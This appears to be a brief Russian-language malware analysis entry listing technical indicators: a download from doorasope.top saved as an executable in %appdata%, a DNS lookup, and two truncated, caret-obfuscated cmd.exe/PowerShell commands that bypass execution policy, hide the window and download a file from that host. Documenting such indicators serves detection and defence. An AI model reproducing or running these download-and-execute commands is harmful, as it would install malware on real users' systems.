Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WER^s^he^LL.E^Xe^ -e^XEcuTIonPOLiC^Y^ b^yPA^SS^ -^NO^pr^O^f^i^L^e -WiNdoWstyLe HiD^DEN ^(nEw^-oBj^eCT^ SYS^teM.^nEt.^wEb^CL^IeNt)^.d^OWNL^Oa^D^Fil^E('http://www.doorasop...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PO^WER^s^he^LL.E^Xe^ -e^XEcuTIonPOLiC^Y^ b^yPA^SS^ -^NO^pr^O^f^i^L^e -WiNdoWstyLe HiD^DEN ^(nEw^-oBj^eCT^ SYS^teM.^nEt.^wEb^CL^IeNt)^.d^OWNL^Oa^D^Fil^E('http://www.doorasop...' (со скрытым окном)